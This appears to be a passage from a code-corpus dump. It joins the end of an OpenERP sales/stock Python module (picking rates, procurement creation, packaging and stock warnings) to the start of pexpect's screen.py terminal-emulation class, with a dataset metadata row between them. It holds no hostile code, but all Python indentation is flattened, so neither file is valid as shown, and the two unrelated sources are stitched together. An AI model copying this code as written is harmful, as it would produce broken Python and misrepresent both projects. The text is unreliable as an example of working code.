p.sale_id IN %s GROUP BY m.state, mp.state, p.sale_id, p.type''', (tuple(ids),))
for item in cr.dictfetchall():
if item['move_state'] == 'cancel':
continue
if item['picking_type'] == 'in':#this is a returned picking
tmp[item['sale_order_id']]['total'] -= item['nbr'] or 0.0 # Deducting the return picking qty
if item['procurement_state'] == 'done' or item['move_state'] == 'done':
tmp[item['sale_order_id']]['picked'] -= item['nbr'] or 0.0
else:
tmp[item['sale_order_id']]['total'] += item['nbr'] or 0.0
if item['procurement_state'] == 'done' or item['move_state'] == 'done':
tmp[item['sale_order_id']]['picked'] += item['nbr'] or 0.0
for order in self.browse(cr, uid, ids, context=context):
if order.shipped:
res[order.id] = 100.0
else:
res[order.id] = tmp[order.id]['total'] and (100.0 * tmp[order.id]['picked'] / tmp[order.id]['total']) or 0.0
return res
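    # Worked example (illustrative numbers, not taken from the query above): an
    # order with two outgoing moves of 3 and 7 units where only the 3-unit move
    # is done gives tmp[order_id] == {'picked': 3.0, 'total': 10.0}, so the rate
    # is 100.0 * 3.0 / 10.0 == 30.0. Moves on 'in' (returned) pickings are
    # subtracted from both counters, and fully shipped orders short-circuit to 100.0.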
_columns = {
'state': fields.selection([
('draft', 'Draft Quotation'),
('sent', 'Quotation Sent'),
('cancel', 'Cancelled'),
('waiting_date', 'Waiting Schedule'),
('progress', 'Sales Order'),
('manual', 'Sale to Invoice'),
('shipping_except', 'Shipping Exception'),
('invoice_except', 'Invoice Exception'),
('done', 'Done'),
], 'Status', readonly=True, track_visibility='onchange',
help="Gives the status of the quotation or sales order.\
\nThe exception status is automatically set when a cancel operation occurs \
in the invoice validation (Invoice Exception) or in the picking list process (Shipping Exception).\nThe 'Waiting Schedule' status is set when the invoice is confirmed\
but waiting for the scheduler to run on the order date.", select=True),
'incoterm': fields.many2one('stock.incoterms', 'Incoterm', help="International Commercial Terms are a series of predefined commercial terms used in international transactions."),
'picking_policy': fields.selection([('direct', 'Deliver each product when available'), ('one', 'Deliver all products at once')],
'Shipping Policy', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""Pick 'Deliver each product when available' if you allow partial delivery."""),
'order_policy': fields.selection([
('manual', 'On Demand'),
('picking', 'On Delivery Order'),
('prepaid', 'Before Delivery'),
], 'Create Invoice', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""On demand: A draft invoice can be created from the sales order when needed. \nOn delivery order: A draft invoice can be created from the delivery order when the products have been delivered. \nBefore delivery: A draft invoice is created from the sales order and must be paid before the products can be delivered."""),
'picking_ids': fields.one2many('stock.picking.out', 'sale_id', 'Related Picking', readonly=True, help="This is a list of delivery orders that has been generated for this sales order."),
'shipped': fields.boolean('Delivered', readonly=True, help="It indicates that the sales order has been delivered. This field is updated only after the scheduler(s) have been launched."),
'picked_rate': fields.function(_picked_rate, string='Picked', type='float'),
'invoice_quantity': fields.selection([('order', 'Ordered Quantities'), ('procurement', 'Shipped Quantities')], 'Invoice on',
help="The sales order will automatically create the invoice proposition (draft invoice).\
You have to choose if you want your invoice based on ordered or shipped quantities.", required=True, readonly=True, states={'draft': [('readonly', False)]}),
}
_defaults = {
'picking_policy': 'direct',
'order_policy': 'manual',
'invoice_quantity': 'order',
}
# Form filling
def unlink(self, cr, uid, ids, context=None):
sale_orders = self.read(cr, uid, ids, ['state'], context=context)
unlink_ids = []
for s in sale_orders:
if s['state'] in ['draft', 'cancel']:
unlink_ids.append(s['id'])
else:
raise osv.except_osv(_('Invalid Action!'), _('In order to delete a confirmed sales order, you must cancel it.\nTo do so, you must first cancel related picking for delivery orders.'))
return osv.osv.unlink(self, cr, uid, unlink_ids, context=context)
def action_view_delivery(self, cr, uid, ids, context=None):
'''
This function returns an action that displays the existing delivery orders of the given sales order ids. It can be either a list view or a form view; the form view is used when there is only one delivery order to show.
'''
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
result = mod_obj.get_object_reference(cr, uid, 'stock', 'action_picking_tree')
id = result and result[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
#compute the number of delivery orders to display
pick_ids = []
for so in self.browse(cr, uid, ids, context=context):
pick_ids += [picking.id for picking in so.picking_ids]
#choose the view_mode accordingly
if len(pick_ids) > 1:
result['domain'] = "[('id','in',["+','.join(map(str, pick_ids))+"])]"
else:
res = mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_out_form')
result['views'] = [(res and res[1] or False, 'form')]
result['res_id'] = pick_ids and pick_ids[0] or False
return result
def action_invoice_create(self, cr, uid, ids, grouped=False, states=['confirmed', 'done', 'exception'], date_invoice = False, context=None):
picking_obj = self.pool.get('stock.picking')
res = super(sale_order,self).action_invoice_create( cr, uid, ids, grouped=grouped, states=states, date_invoice = date_invoice, context=context)
for order in self.browse(cr, uid, ids, context=context):
if order.order_policy == 'picking':
picking_obj.write(cr, uid, map(lambda x: x.id, order.picking_ids), {'invoice_state': 'invoiced'})
return res
def action_cancel(self, cr, uid, ids, context=None):
wf_service = netsvc.LocalService("workflow")
if context is None:
context = {}
sale_order_line_obj = self.pool.get('sale.order.line')
proc_obj = self.pool.get('procurement.order')
for sale in self.browse(cr, uid, ids, context=context):
for pick in sale.picking_ids:
if pick.state not in ('draft', 'cancel'):
raise osv.except_osv(
_('Cannot cancel sales order!'),
_('You must first cancel all delivery order(s) attached to this sales order.'))
if pick.state == 'cancel':
for mov in pick.move_lines:
proc_ids = proc_obj.search(cr, uid, [('move_id', '=', mov.id)])
if proc_ids:
for proc in proc_ids:
wf_service.trg_validate(uid, 'procurement.order', proc, 'button_check', cr)
for r in self.read(cr, uid, ids, ['picking_ids']):
for pick in r['picking_ids']:
wf_service.trg_validate(uid, 'stock.picking', pick, 'button_cancel', cr)
return super(sale_order, self).action_cancel(cr, uid, ids, context=context)
def action_wait(self, cr, uid, ids, context=None):
res = super(sale_order, self).action_wait(cr, uid, ids, context=context)
for o in self.browse(cr, uid, ids):
noprod = self.test_no_product(cr, uid, o, context)
if noprod and o.order_policy=='picking':
self.write(cr, uid, [o.id], {'order_policy': 'manual'}, context=context)
return res
def procurement_lines_get(self, cr, uid, ids, *args):
res = []
for order in self.browse(cr, uid, ids, context={}):
for line in order.order_line:
if line.procurement_id:
res.append(line.procurement_id.id)
return res
def date_to_datetime(self, cr, uid, userdate, context=None):
""" Convert date values expressed in user's timezone to
server-side UTC timestamp, assuming a default arbitrary
time of 12:00 PM (noon) - because a time is needed.
:param str userdate: date string in the user's time zone
:return: UTC datetime string for server-side use
"""
# TODO: move to fields.datetime in server after 7.0
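# Illustrative example (hypothetical timezone): with context {'tz': 'Europe/Brussels'} (UTC+2 in
# summer), '2013-07-01' becomes '2013-07-01 10:00:00', i.e. noon local time expressed in UTC.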
user_date = datetime.strptime(userdate, DEFAULT_SERVER_DATE_FORMAT)
if context and context.get('tz'):
tz_name = context['tz']
else:
tz_name = self.pool.get('res.users').read(cr, SUPERUSER_ID, uid, ['tz'])['tz']
if tz_name:
utc = pytz.timezone('UTC')
context_tz = pytz.timezone(tz_name)
user_datetime = user_date + relativedelta(hours=12.0)
local_timestamp = context_tz.localize(user_datetime, is_dst=False)
user_datetime = local_timestamp.astimezone(utc)
return user_datetime.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return user_date.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
# if mode == 'finished':
# returns True if all lines are done, False otherwise
# if mode == 'canceled':
# returns True if there is at least one canceled line, False otherwise
def test_state(self, cr, uid, ids, mode, *args):
assert mode in ('finished', 'canceled'), _("invalid mode for test_state")
finished = True
canceled = False
write_done_ids = []
write_cancel_ids = []
for order in self.browse(cr, uid, ids, context={}):
for line in order.order_line:
if (not line.procurement_id) or (line.procurement_id.state=='done'):
if line.state != 'done':
write_done_ids.append(line.id)
else:
finished = False
if line.procurement_id:
if (line.procurement_id.state == 'cancel'):
canceled = True
if line.state != 'exception':
write_cancel_ids.append(line.id)
if write_done_ids:
self.pool.get('sale.order.line').write(cr, uid, write_done_ids, {'state': 'done'})
if write_cancel_ids:
self.pool.get('sale.order.line').write(cr, uid, write_cancel_ids, {'state': 'exception'})
if mode == 'finished':
return finished
elif mode == 'canceled':
return canceled
def _prepare_order_line_procurement(self, cr, uid, order, line, move_id, date_planned, context=None):
return {
'name': line.name,
'origin': order.name,
'date_planned': date_planned,
'product_id': line.product_id.id,
'product_qty': line.product_uom_qty,
'product_uom': line.product_uom.id,
'product_uos_qty': (line.product_uos and line.product_uos_qty)\
or line.product_uom_qty,
'product_uos': (line.product_uos and line.product_uos.id)\
or line.product_uom.id,
'location_id': order.shop_id.warehouse_id.lot_stock_id.id,
'procure_method': line.type,
'move_id': move_id,
'company_id': order.company_id.id,
'note': line.name,
}
def _prepare_order_line_move(self, cr, uid, order, line, picking_id, date_planned, context=None):
location_id = order.shop_id.warehouse_id.lot_stock_id.id
output_id = order.shop_id.warehouse_id.lot_output_id.id
return {
'name': line.name,
'picking_id': picking_id,
'product_id': line.product_id.id,
'date': date_planned,
'date_expected': date_planned,
'product_qty': line.product_uom_qty,
'product_uom': line.product_uom.id,
'product_uos_qty': (line.product_uos and line.product_uos_qty) or line.product_uom_qty,
'product_uos': (line.product_uos and line.product_uos.id)\
or line.product_uom.id,
'product_packaging': line.product_packaging.id,
'partner_id': line.address_allotment_id.id or order.partner_shipping_id.id,
'location_id': location_id,
'location_dest_id': output_id,
'sale_line_id': line.id,
'tracking_id': False,
'state': 'draft',
#'state': 'waiting',
'company_id': order.company_id.id,
'price_unit': line.product_id.standard_price or 0.0
}
def _prepare_order_picking(self, cr, uid, order, context=None):
pick_name = self.pool.get('ir.sequence').get(cr, uid, 'stock.picking.out')
return {
'name': pick_name,
'origin': order.name,
'date': self.date_to_datetime(cr, uid, order.date_order, context),
'type': 'out',
'state': 'auto',
'move_type': order.picking_policy,
'sale_id': order.id,
'partner_id': order.partner_shipping_id.id,
'note': order.note,
'invoice_state': (order.order_policy=='picking' and '2binvoiced') or 'none',
'company_id': order.company_id.id,
}
def ship_recreate(self, cr, uid, order, line, move_id, proc_id):
"""
Adjust (or remove) the recreated stock move and procurement of a sales order line after a shipping exception.
:param order: sales order to which the order line belongs
:param line: sales order line record to procure
:param move_id: the ID of the stock move
:param proc_id: the ID of the procurement
"""
move_obj = self.pool.get('stock.move')
proc_obj = self.pool.get('procurement.order')
if move_id and order.state == 'shipping_except':
current_move = move_obj.browse(cr, uid, move_id)
moves = []
for picking in order.picking_ids:
if picking.id != current_move.picking_id.id and picking.state != 'cancel':
moves.extend(move for move in picking.move_lines if move.state != 'cancel' and move.sale_line_id.id == line.id)
if moves:
product_qty = current_move.product_qty
product_uos_qty = current_move.product_uos_qty
for move in moves:
product_qty -= move.product_qty
product_uos_qty -= move.product_uos_qty
if product_qty > 0 or product_uos_qty > 0:
move_obj.write(cr, uid, [move_id], {'product_qty': product_qty, 'product_uos_qty': product_uos_qty})
proc_obj.write(cr, uid, [proc_id], {'product_qty': product_qty, 'product_uos_qty': product_uos_qty})
else:
current_move.unlink()
proc_obj.unlink(cr, uid, [proc_id])
return True
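# Planned date = start date + line delivery lead time - company security lead days
# (e.g., with hypothetical values: start date 2013-01-10, a 7-day delay and a 2-day security
# lead give a planned date of 2013-01-15).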
def _get_date_planned(self, cr, uid, order, line, start_date, context=None):
start_date = self.date_to_datetime(cr, uid, start_date, context)
date_planned = datetime.strptime(start_date, DEFAULT_SERVER_DATETIME_FORMAT) + relativedelta(days=line.delay or 0.0)
date_planned = (date_planned - timedelta(days=order.company_id.security_lead)).strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return date_planned
def _create_pickings_and_procurements(self, cr, uid, order, order_lines, picking_id=False, context=None):
"""Create the required procurements to supply sales order lines, also connecting
the procurements to appropriate stock moves in order to bring the goods to the
sales order's requested location.
If ``picking_id`` is provided, the stock moves will be added to it, otherwise
a standard outgoing picking will be created to wrap the stock moves, as returned
by :meth:`~._prepare_order_picking`.
Modules that wish to customize the procurements or partition the stock moves over
multiple stock pickings may override this method and call ``super()`` with
different subsets of ``order_lines`` and/or preset ``picking_id`` values.
:param browse_record order: sales order to which the order lines belong
:param list(browse_record) order_lines: sales order line records to procure
:param int picking_id: optional ID of a stock picking to which the created stock moves
will be added. A new picking will be created if omitted.
:return: True
"""
move_obj = self.pool.get('stock.move')
picking_obj = self.pool.get('stock.picking')
procurement_obj = self.pool.get('procurement.order')
proc_ids = []
for line in order_lines:
if line.state == 'done':
continue
date_planned = self._get_date_planned(cr, uid, order, line, order.date_order, context=context)
if line.product_id:
if line.product_id.type in ('product', 'consu'):
if not picking_id:
picking_id = picking_obj.create(cr, uid, self._prepare_order_picking(cr, uid, order, context=context))
move_id = move_obj.create(cr, uid, self._prepare_order_line_move(cr, uid, order, line, picking_id, date_planned, context=context))
else:
# a service has no stock move
move_id = False
proc_id = procurement_obj.create(cr, uid, self._prepare_order_line_procurement(cr, uid, order, line, move_id, date_planned, context=context))
proc_ids.append(proc_id)
line.write({'procurement_id': proc_id})
self.ship_recreate(cr, uid, order, line, move_id, proc_id)
wf_service = netsvc.LocalService("workflow")
if picking_id:
wf_service.trg_validate(uid, 'stock.picking', picking_id, 'button_confirm', cr)
for proc_id in proc_ids:
wf_service.trg_validate(uid, 'procurement.order', proc_id, 'button_confirm', cr)
val = {}
if order.state == 'shipping_except':
val['state'] = 'progress'
val['shipped'] = False
if (order.order_policy == 'manual'):
for line in order.order_line:
if (not line.invoiced) and (line.state not in ('cancel', 'draft')):
val['state'] = 'manual'
break
order.write(val)
return True
def action_ship_create(self, cr, uid, ids, context=None):
for order in self.browse(cr, uid, ids, context=context):
self._create_pickings_and_procurements(cr, uid, order, order.order_line, None, context=context)
return True
def action_ship_end(self, cr, uid, ids, context=None):
for order in self.browse(cr, uid, ids, context=context):
val = {'shipped': True}
if order.state == 'shipping_except':
val['state'] = 'progress'
if (order.order_policy == 'manual'):
for line in order.order_line:
if (not line.invoiced) and (line.state not in ('cancel', 'draft')):
val['state'] = 'manual'
break
for line in order.order_line:
towrite = []
if line.state == 'exception':
towrite.append(line.id)
if towrite:
self.pool.get('sale.order.line').write(cr, uid, towrite, {'state': 'done'}, context=context)
res = self.write(cr, uid, [order.id], val)
return True
def has_stockable_products(self, cr, uid, ids, *args):
for order in self.browse(cr, uid, ids):
for order_line in order.order_line:
if order_line.product_id and order_line.product_id.type in ('product', 'consu'):
return True
return False
class sale_order_line(osv.osv):
def _number_packages(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
try:
res[line.id] = int((line.product_uom_qty+line.product_packaging.qty-0.0001) / line.product_packaging.qty)
except:
res[line.id] = 1
return res
_inherit = 'sale.order.line'
_columns = {
'delay': fields.float('Delivery Lead Time', required=True, help="Number of days between the order confirmation and the shipping of the products to the customer", readonly=True, states={'draft': [('readonly', False)]}),
'procurement_id': fields.many2one('procurement.order', 'Procurement'),
'property_ids': fields.many2many('mrp.property', 'sale_order_line_property_rel', 'order_id', 'property_id', 'Properties', readonly=True, states={'draft': [('readonly', False)]}),
'product_packaging': fields.many2one('product.packaging', 'Packaging'),
'move_ids': fields.one2many('stock.move', 'sale_line_id', 'Inventory Moves', readonly=True),
'number_packages': fields.function(_number_packages, type='integer', string='Number Packages'),
}
_defaults = {
'delay': 0.0,
'product_packaging': False,
}
def _get_line_qty(self, cr, uid, line, context=None):
if line.procurement_id and not (line.order_id.invoice_quantity=='order'):
return self.pool.get('procurement.order').quantity_get(cr, uid,
line.procurement_id.id, context=context)
else:
return super(sale_order_line, self)._get_line_qty(cr, uid, line, context=context)
def _get_line_uom(self, cr, uid, line, context=None):
if line.procurement_id and not (line.order_id.invoice_quantity=='order'):
return self.pool.get('procurement.order').uom_get(cr, uid,
line.procurement_id.id, context=context)
else:
return super(sale_order_line, self)._get_line_uom(cr, uid, line, context=context)
def button_cancel(self, cr, uid, ids, context=None):
res = super(sale_order_line, self).button_cancel(cr, uid, ids, context=context)
for line in self.browse(cr, uid, ids, context=context):
for move_line in line.move_ids:
if move_line.state != 'cancel':
raise osv.except_osv(
_('Cannot cancel sales order line!'),
_('You must first cancel stock moves attached to this sales order line.'))
return res
def copy_data(self, cr, uid, id, default=None, context=None):
if not default:
default = {}
default.update({'move_ids': []})
return super(sale_order_line, self).copy_data(cr, uid, id, default, context=context)
def product_packaging_change(self, cr, uid, ids, pricelist, product, qty=0, uom=False,
partner_id=False, packaging=False, flag=False, context=None):
if not product:
return {'value': {'product_packaging': False}}
product_obj = self.pool.get('product.product')
product_uom_obj = self.pool.get('product.uom')
pack_obj = self.pool.get('product.packaging')
warning = {}
result = {}
warning_msgs = ''
if flag:
res = self.product_id_change(cr, uid, ids, pricelist=pricelist,
product=product, qty=qty, uom=uom, partner_id=partner_id,
packaging=packaging, flag=False, context=context)
warning_msgs = res.get('warning') and res['warning']['message']
products = product_obj.browse(cr, uid, product, context=context)
if not products.packaging:
packaging = result['product_packaging'] = False
elif not packaging and products.packaging and not flag:
packaging = products.packaging[0].id
result['product_packaging'] = packaging
if packaging:
default_uom = products.uom_id and products.uom_id.id
pack = pack_obj.browse(cr, uid, packaging, context=context)
q = product_uom_obj._compute_qty(cr, uid, uom, pack.qty, default_uom)
# qty = qty - qty % q + q
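# Warn when the ordered quantity is not an exact multiple of the packaging quantity.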
if qty and (q and not (qty % q) == 0):
ean = pack.ean or _('(n/a)')
qty_pack = pack.qty
type_ul = pack.ul
if not warning_msgs:
warn_msg = _("You selected a quantity of %d Units.\n"
"But it's not compatible with the selected packaging.\n"
"Here is a proposition of quantities according to the packaging:\n"
"EAN: %s Quantity: %s Type of ul: %s") % \
(qty, ean, qty_pack, type_ul.name)
warning_msgs += _("Picking Information ! : ") + warn_msg + "\n\n"
warning = {
'title': _('Configuration Error!'),
'message': warning_msgs
}
result['product_uom_qty'] = qty
return {'value': result, 'warning': warning}
def product_id_change(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, context=None):
context = context or {}
product_uom_obj = self.pool.get('product.uom')
partner_obj = self.pool.get('res.partner')
product_obj = self.pool.get('product.product')
warning = {}
res = super(sale_order_line, self).product_id_change(cr, uid, ids, pricelist, product, qty=qty,
uom=uom, qty_uos=qty_uos, uos=uos, name=name, partner_id=partner_id,
lang=lang, update_tax=update_tax, date_order=date_order, packaging=packaging, fiscal_position=fiscal_position, flag=flag, context=context)
if not product:
res['value'].update({'product_packaging': False})
return res
# set product uom in context to get virtual stock in current uom
if res.get('value', {}).get('product_uom'):
# use the uom changed by super call
context.update({'uom': res['value']['product_uom']})
elif uom:
# fallback on selected
context.update({'uom': uom})
# update the result obtained from the super call
product_obj = product_obj.browse(cr, uid, product, context=context)
res['value']['delay'] = (product_obj.sale_delay or 0.0)
res['value']['type'] = product_obj.procure_method
# check if the product is available; if not, add a warning message
uom2 = False
if uom:
uom2 = product_uom_obj.browse(cr, uid, uom, context=context)
if product_obj.uom_id.category_id.id != uom2.category_id.id:
uom = False
if not uom2:
uom2 = product_obj.uom_id
# Calling product_packaging_change function after updating UoM
res_packing = self.product_packaging_change(cr, uid, ids, pricelist, product, qty, uom, partner_id, packaging, context=context)
res['value'].update(res_packing.get('value', {}))
warning_msgs = res_packing.get('warning') and res_packing['warning']['message'] or ''
compare_qty = float_compare(product_obj.virtual_available, qty, precision_rounding=uom2.rounding)
if (product_obj.type=='product') and int(compare_qty) == -1 \
and (product_obj.procure_method=='make_to_stock'):
warn_msg = _('You plan to sell %.2f %s but you only have %.2f %s available !\nThe real stock is %.2f %s. (without reservations)') % \
(qty, uom2.name,
max(0,product_obj.virtual_available), uom2.name,
max(0,product_obj.qty_available), uom2.name)
warning_msgs += _("Not enough stock ! : ") + warn_msg + "\n\n"
#update of warning messages
if warning_msgs:
warning = {
'title': _('Configuration Error!'),
'message' : warning_msgs
}
res.update({'warning': warning})
return res
class sale_advance_payment_inv(osv.osv_memory):
_inherit = "sale.advance.payment.inv"
def _create_invoices(self, cr, uid, inv_values, sale_id, context=None):
result = super(sale_advance_payment_inv, self)._create_invoices(cr, uid, inv_values, sale_id, context=context)
sale_obj = self.pool.get('sale.order')
sale_line_obj = self.pool.get('sale.order.line')
wizard = self.browse(cr, uid, [result], context)
sale = sale_obj.browse(cr, uid, sale_id, context=context)
# If invoice on picking: add the cost on the SO
# If not, the advance will be deducted when generating the final invoice
line_name = inv_values.get('invoice_line') and inv_values.get('invoice_line')[0][2].get('name') or ''
line_tax = inv_values.get('invoice_line') and inv_values.get('invoice_line')[0][2].get('invoice_line_tax_id') or False
if sale.order_policy == 'picking':
vals = {
'order_id': sale.id,
'name': line_name,
'price_unit': -(inv_values.get('invoice_line') and inv_values.get('invoice_line')[0][2].get('price_unit') or 0.0),
'product_uom_qty': wizard.qtty or 1.0,
'product_uos_qty': wizard.qtty or 1.0,
'product_uos': wizard.product_id.uos_id and wizard.product_id.uos_id.id or False,
'product_uom': wizard.product_id.uom_id and wizard.product_id.uom_id.id or False,
'product_id': wizard.product_id.id or False,
'discount': False,
'tax_id': line_tax,
}
sale_line_obj.create(cr, uid, vals, context=context)
return result
| agpl-3.0 | 2,113,200,217,397,163,300 | 49.703102 | 337 | 0.57353 | false |
indashnet/InDashNet.Open.UN2000 | android/external/chromium_org/third_party/pexpect/screen.py | 171 | 11281 | """This implements a virtual screen. This is used to support ANSI terminal
emulation. The screen representation and state is implemented in this class.
Most of the methods are inspired by ANSI screen control codes. The ANSI class
extends this class to add parsing of ANSI escape codes.
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <[email protected]>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
import copy
NUL = 0 # Fill character; ignored on input.
ENQ = 5 # Transmit answerback message.
BEL = 7 # Ring the bell.
BS = 8 # Move cursor left.
HT = 9 # Move cursor to next tab stop.
LF = 10 # Line feed.
VT = 11 # Same as LF.
FF = 12 # Same as LF.
CR = 13 # Move cursor to left margin or newline.
SO = 14 # Invoke G1 character set.
SI = 15 # Invoke G0 character set.
XON = 17 # Resume transmission.
XOFF = 19 # Halt transmission.
CAN = 24 # Cancel escape sequence.
SUB = 26 # Same as CAN.
ESC = 27 # Introduce a control sequence.
DEL = 127 # Fill character; ignored on input.
SPACE = chr(32) # Space or blank character.
def constrain (n, min, max):
"""This returns a number, n constrained to the min and max bounds. """
if n < min:
return min
if n > max:
return max
return n
class screen:
"""This object maintains the state of a virtual text screen as a
rectangular array. This maintains a virtual cursor position and handles
scrolling as characters are added. This supports most of the methods needed
by an ANSI text screen. Row and column indexes are 1-based (not zero-based,
like arrays). """
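# Example usage (illustrative):
#   sc = screen(24, 80)    # 24 rows x 80 columns, filled with spaces
#   sc.put_abs(1, 1, 'A')  # write 'A' at the top-left corner
#   print sc.pretty()      # dump the screen surrounded by an ASCII border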
def __init__ (self, r=24,c=80):
"""This initializes a blank scree of the given dimentions."""
self.rows = r
self.cols = c
self.cur_r = 1
self.cur_c = 1
self.cur_saved_r = 1
self.cur_saved_c = 1
self.scroll_row_start = 1
self.scroll_row_end = self.rows
self.w = [ [SPACE] * self.cols for c in range(self.rows)]
def __str__ (self):
"""This returns a printable representation of the screen. The end of
each screen line is terminated by a newline. """
return '\n'.join ([ ''.join(c) for c in self.w ])
def dump (self):
"""This returns a copy of the screen as a string. This is similar to
__str__ except that lines are not terminated with line feeds. """
return ''.join ([ ''.join(c) for c in self.w ])
def pretty (self):
"""This returns a copy of the screen as a string with an ASCII text box
around the screen border. This is similar to __str__ except that it
adds a box. """
top_bot = '+' + '-'*self.cols + '+\n'
return top_bot + '\n'.join(['|'+line+'|' for line in str(self).split('\n')]) + '\n' + top_bot
def fill (self, ch=SPACE):
self.fill_region (1,1,self.rows,self.cols, ch)
def fill_region (self, rs,cs, re,ce, ch=SPACE):
rs = constrain (rs, 1, self.rows)
re = constrain (re, 1, self.rows)
cs = constrain (cs, 1, self.cols)
ce = constrain (ce, 1, self.cols)
if rs > re:
rs, re = re, rs
if cs > ce:
cs, ce = ce, cs
for r in range (rs, re+1):
for c in range (cs, ce + 1):
self.put_abs (r,c,ch)
def cr (self):
"""This moves the cursor to the beginning (col 1) of the current row.
"""
self.cursor_home (self.cur_r, 1)
def lf (self):
"""This moves the cursor down with scrolling.
"""
old_r = self.cur_r
self.cursor_down()
if old_r == self.cur_r:
self.scroll_up ()
self.erase_line()
def crlf (self):
"""This advances the cursor with CRLF properties.
The cursor will line wrap and the screen may scroll.
"""
self.cr ()
self.lf ()
def newline (self):
"""This is an alias for crlf().
"""
self.crlf()
def put_abs (self, r, c, ch):
"""Screen array starts at 1 index."""
r = constrain (r, 1, self.rows)
c = constrain (c, 1, self.cols)
ch = str(ch)[0]
self.w[r-1][c-1] = ch
def put (self, ch):
"""This puts a characters at the current cursor position.
"""
self.put_abs (self.cur_r, self.cur_c, ch)
def insert_abs (self, r, c, ch):
"""This inserts a character at (r,c). Everything under
and to the right is shifted right one character.
The last character of the line is lost.
"""
r = constrain (r, 1, self.rows)
c = constrain (c, 1, self.cols)
for ci in range (self.cols, c, -1):
self.put_abs (r,ci, self.get_abs(r,ci-1))
self.put_abs (r,c,ch)
def insert (self, ch):
self.insert_abs (self.cur_r, self.cur_c, ch)
def get_abs (self, r, c):
r = constrain (r, 1, self.rows)
c = constrain (c, 1, self.cols)
return self.w[r-1][c-1]
def get (self):
return self.get_abs (self.cur_r, self.cur_c)
def get_region (self, rs,cs, re,ce):
"""This returns a list of lines representing the region.
"""
rs = constrain (rs, 1, self.rows)
re = constrain (re, 1, self.rows)
cs = constrain (cs, 1, self.cols)
ce = constrain (ce, 1, self.cols)
if rs > re:
rs, re = re, rs
if cs > ce:
cs, ce = ce, cs
sc = []
for r in range (rs, re+1):
line = ''
for c in range (cs, ce + 1):
ch = self.get_abs (r,c)
line = line + ch
sc.append (line)
return sc
def cursor_constrain (self):
"""This keeps the cursor within the screen area.
"""
self.cur_r = constrain (self.cur_r, 1, self.rows)
self.cur_c = constrain (self.cur_c, 1, self.cols)
def cursor_home (self, r=1, c=1): # <ESC>[{ROW};{COLUMN}H
self.cur_r = r
self.cur_c = c
self.cursor_constrain ()
def cursor_back (self,count=1): # <ESC>[{COUNT}D (not confused with down)
self.cur_c = self.cur_c - count
self.cursor_constrain ()
def cursor_down (self,count=1): # <ESC>[{COUNT}B (not confused with back)
self.cur_r = self.cur_r + count
self.cursor_constrain ()
def cursor_forward (self,count=1): # <ESC>[{COUNT}C
self.cur_c = self.cur_c + count
self.cursor_constrain ()
def cursor_up (self,count=1): # <ESC>[{COUNT}A
self.cur_r = self.cur_r - count
self.cursor_constrain ()
def cursor_up_reverse (self): # <ESC> M (called RI -- Reverse Index)
old_r = self.cur_r
self.cursor_up()
if old_r == self.cur_r:
self.scroll_up()
def cursor_force_position (self, r, c): # <ESC>[{ROW};{COLUMN}f
"""Identical to Cursor Home."""
self.cursor_home (r, c)
def cursor_save (self): # <ESC>[s
"""Save current cursor position."""
self.cursor_save_attrs()
def cursor_unsave (self): # <ESC>[u
"""Restores cursor position after a Save Cursor."""
self.cursor_restore_attrs()
def cursor_save_attrs (self): # <ESC>7
"""Save current cursor position."""
self.cur_saved_r = self.cur_r
self.cur_saved_c = self.cur_c
def cursor_restore_attrs (self): # <ESC>8
"""Restores cursor position after a Save Cursor."""
self.cursor_home (self.cur_saved_r, self.cur_saved_c)
def scroll_constrain (self):
"""This keeps the scroll region within the screen region."""
if self.scroll_row_start <= 0:
self.scroll_row_start = 1
if self.scroll_row_end > self.rows:
self.scroll_row_end = self.rows
def scroll_screen (self): # <ESC>[r
"""Enable scrolling for entire display."""
self.scroll_row_start = 1
self.scroll_row_end = self.rows
def scroll_screen_rows (self, rs, re): # <ESC>[{start};{end}r
"""Enable scrolling from row {start} to row {end}."""
self.scroll_row_start = rs
self.scroll_row_end = re
self.scroll_constrain()
def scroll_down (self): # <ESC>D
"""Scroll display down one line."""
# Screen is indexed from 1, but arrays are indexed from 0.
s = self.scroll_row_start - 1
e = self.scroll_row_end - 1
self.w[s+1:e+1] = copy.deepcopy(self.w[s:e])
def scroll_up (self): # <ESC>M
"""Scroll display up one line."""
# Screen is indexed from 1, but arrays are indexed from 0.
s = self.scroll_row_start - 1
e = self.scroll_row_end - 1
self.w[s:e] = copy.deepcopy(self.w[s+1:e+1])
def erase_end_of_line (self): # <ESC>[0K -or- <ESC>[K
"""Erases from the current cursor position to the end of the current
line."""
self.fill_region (self.cur_r, self.cur_c, self.cur_r, self.cols)
def erase_start_of_line (self): # <ESC>[1K
"""Erases from the current cursor position to the start of the current
line."""
self.fill_region (self.cur_r, 1, self.cur_r, self.cur_c)
def erase_line (self): # <ESC>[2K
